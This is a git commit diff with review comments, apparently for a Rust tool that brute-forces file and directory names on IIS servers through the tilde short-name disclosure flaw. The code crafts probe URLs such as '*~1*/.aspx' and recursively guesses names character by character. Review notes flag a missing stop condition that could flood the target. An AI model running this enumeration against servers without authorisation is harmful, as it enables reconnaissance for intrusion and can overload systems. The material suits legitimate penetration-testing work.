wip: first draft for tilde enum module
phra committed Jun 25, 2019
1 parent 3f89b2d commit 622a89f
Showing 2 changed files with 87 additions and 62 deletions.
144 changes: 84 additions & 60 deletions src/tildebuster/mod.rs
@@ -151,24 +151,25 @@ impl TildeBuster {
}
None => {
match msg.kind {
FSObject::NOT_EXISTING => {
trace!("{:?}", msg);
},
FSObject::FILE => {
if msg.request.extension.len() < 3 {

} else {
if no_progress_bar {
println!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
);
} else {
bar.println(format!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
));
}
}
if no_progress_bar {
println!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
);
} else {
bar.println(format!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
));
}

result_processor.maybe_add_result(msg);
},
FSObject::DIRECTORY => {
if no_progress_bar {
@@ -182,23 +183,25 @@ impl TildeBuster {
msg.request.filename,
));
}

result_processor.maybe_add_result(msg);
},
FSObject::EXISTING_FILE => {
FSObject::BRUTE_EXTENSION => {
for c in chars1.iter() {
let mut request = msg.request.clone();
request.extension = format!("{}{}", msg.request.extension, c);
request.extension = format!("{}{}", request.extension, c);
rt::spawn(TildeBuster::_brute_extension(tx1.clone(), client1.clone(), request));
}
}
FSObject::EXISTING_DIRECTORY => {
},
FSObject::BRUTE_FILENAME => {
for c in chars1.iter() {
let mut request = msg.request.clone();
request.filename = format!("{}{}", msg.request.filename, c);
request.filename = format!("{}{}", request.filename, c);
rt::spawn(TildeBuster::_brute_filename(tx1.clone(), client1.clone(), request));
}
},
FSObject::NOT_EXISTING => {
trace!("{:?}", msg);
FSObject::CHECK_IF_DIRECTORY => {
rt::spawn(TildeBuster::_check_if_directory(tx1.clone(), client1.clone(), msg.request));
},
}
},
@@ -218,12 +221,11 @@ impl TildeBuster {
client: Client<HttpsConnector<HttpConnector>>,
request: TildeRequest,
) -> impl Future<Item = (), Error = ()> {
let mut request = request;
request.url = format!("{}~1.{}{}", request.url, request.extension, "%3f".repeat(3 - request.extension.len()));
let vuln_url = format!("{}~1.{}{}", request.url, request.extension, "%3f".repeat(3 - request.extension.len()));
let hyper_request = Request::builder()
.header("User-Agent", &request.user_agent[..])
.method(&request.http_method[..])
.uri(&request.url.parse::<hyper::Uri>().unwrap())
.uri(&vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(request.http_body.clone()))
.expect("Request builder");

@@ -241,7 +243,7 @@ impl TildeBuster {
},
(hyper::StatusCode::NOT_FOUND, _) => {
let res = SingleTildeScanResult {
kind: FSObject::EXISTING_FILE,
kind: FSObject::BRUTE_EXTENSION,
error: None,
request: request,
};
@@ -274,12 +276,11 @@ impl TildeBuster {
request: TildeRequest,
) -> impl Future<Item = (), Error = ()> {
let magic_suffix = "*~1*/.aspx";
let mut request = request;
request.url = format!("{}{}", request.url, magic_suffix); // TODO: do not append every time
let vuln_url = format!("{}{}", request.url, magic_suffix);
let hyper_request = Request::builder()
.header("User-Agent", &request.user_agent[..])
.method(&request.http_method[..])
.uri(&request.url.parse::<hyper::Uri>().unwrap())
.uri(&vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(request.http_body.clone()))
.expect("Request builder");

@@ -288,32 +289,16 @@ impl TildeBuster {
.and_then(move |res| {
match (res.status(), request.url.len()) {
(hyper::StatusCode::NOT_FOUND, 6) => {
rt::spawn(TildeBuster::_check_if_directory(tx.clone(), client.clone(), request.clone())
.and_then(move |is_directory| {
match is_directory {
true => {
let res = SingleTildeScanResult {
kind: FSObject::DIRECTORY,
error: None,
request: request,
};
tx.send(res).unwrap();
},
false => {
let res = SingleTildeScanResult {
kind: FSObject::EXISTING_FILE,
error: None,
request: request,
};
tx.send(res).unwrap();
},
}
Ok(())
}));
let res = SingleTildeScanResult {
kind: FSObject::CHECK_IF_DIRECTORY,
error: None,
request: request,
};
tx.send(res).unwrap();
},
(hyper::StatusCode::NOT_FOUND, _) => {
let res = SingleTildeScanResult {
kind: FSObject::EXISTING_DIRECTORY,
kind: FSObject::BRUTE_FILENAME,
error: None,
request: request,
};
@@ -344,20 +329,59 @@ impl TildeBuster {
tx: Sender<SingleTildeScanResult>,
client: Client<HttpsConnector<HttpConnector>>,
request: TildeRequest,
) -> impl Future<Item = bool, Error = ()> {
futures::future::ok(true) // TODO: implement check directory
) -> impl Future<Item = (), Error = ()> {
let magic_suffix = "~1/.aspx";
let vuln_url = format!("{}{}", request.url, magic_suffix);
let hyper_request = Request::builder()
.header("User-Agent", &request.user_agent[..])
.method(&request.http_method[..])
.uri(vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(request.http_body.clone()))
.expect("Request builder");

client
.request(hyper_request)
.and_then(move |res| {
match res.status() {
hyper::StatusCode::NOT_FOUND => {
let res = SingleTildeScanResult {
kind: FSObject::DIRECTORY,
error: None,
request: request,
};
tx.send(res).unwrap();
},
hyper::StatusCode::BAD_REQUEST => {
let res = SingleTildeScanResult {
kind: FSObject::BRUTE_EXTENSION,
error: None,
request: request,
};
tx.send(res).unwrap();
},
_ => {
warn!("Got invalid HTTP status code when checking if vulnerable: {}", res.status());
},
}

Ok(())
})
.or_else(|e| {
warn!("Got HTTP error when bruteforcing the filename: {}", e);
Ok(())
})
}

pub fn check_iis_version(&self, client: &Client<HttpsConnector<HttpConnector>>) -> impl Future<Item = IISVersion, Error = hyper::Error> {
let request = Request::builder()
let hyper_request = Request::builder()
.header("User-Agent", &self.user_agent[..])
.method(&self.http_method[..])
.uri(self.url.parse::<hyper::Uri>().unwrap())
.body(Body::from(self.http_body.clone()))
.expect("Request builder");

client
.request(request)
.request(hyper_request)
.and_then(move |res| {
let version = res.headers().get("Server").unwrap().to_str().unwrap();
Ok(TildeBuster::map_iis_version(version))
@@ -384,15 +408,15 @@ impl TildeBuster {
pub fn check_if_vulnerable(&self, client: &Client<HttpsConnector<HttpConnector>>, version: IISVersion) -> impl Future<Item = bool, Error = hyper::Error> {
let magic_suffix = "*~1*/.aspx";
let vuln_url = format!("{}{}", self.url, magic_suffix);
let request = Request::builder()
let hyper_request = Request::builder()
.header("User-Agent", &self.user_agent[..])
.method(&self.http_method[..])
.uri(vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(self.http_body.clone()))
.expect("Request builder");

client
.request(request)
.request(hyper_request)
.and_then(|res| {
match res.status() {
hyper::StatusCode::NOT_FOUND => Ok(true),
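Review bot: The `(hyper::StatusCode::NOT_FOUND, 6)` arm in `_brute_filename` still matches on `request.url.len()`, and since `request.url` appears to no longer be mutated it holds the base URL, which for an absolute http(s) URL cannot be six bytes long, so the `CHECK_IF_DIRECTORY` result looks unreachable. Every 404 then falls through to `FSObject::BRUTE_FILENAME`, and the dispatcher answers each of those by spawning one request per entry of `chars1` with no visible depth bound, which can turn a scan into runaway load on the system under test. Matching on the candidate instead, `match (res.status(), request.filename.len()) {`, would make the six-character stop condition effective; the remaining arms of that match lie outside the visible hunk, so confirm that none of them already bounds the recursion. The same length assumption sits in `_brute_extension`, where `3 - request.extension.len()` underflows if an extension longer than three characters ever reaches it.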
5 changes: 3 additions & 2 deletions src/tildebuster/result_processor.rs
@@ -5,8 +5,9 @@ use std::{fs::File, io::Write, path::Path, str};
pub enum FSObject {
FILE,
DIRECTORY,
EXISTING_DIRECTORY,
EXISTING_FILE,
BRUTE_FILENAME,
BRUTE_EXTENSION,
CHECK_IF_DIRECTORY,
NOT_EXISTING,
}

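Review bot: `FSObject` now carries two different kinds of value with no documentation to tell them apart: `FILE`, `DIRECTORY` and `NOT_EXISTING` describe what was found, while `BRUTE_FILENAME`, `BRUTE_EXTENSION` and `CHECK_IF_DIRECTORY` tell the dispatcher in `mod.rs` which request to schedule next. A doc comment per variant would help, for example `/// Scheduling signal: keep extending the filename; never a stored result.` above `BRUTE_FILENAME`, and the enum's own `///` line should say which variants may reach `maybe_add_result`. Rust variants are conventionally `UpperCamelCase` (`BruteFilename`), which would also satisfy the compiler's naming lint, though that rename touches every match arm.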
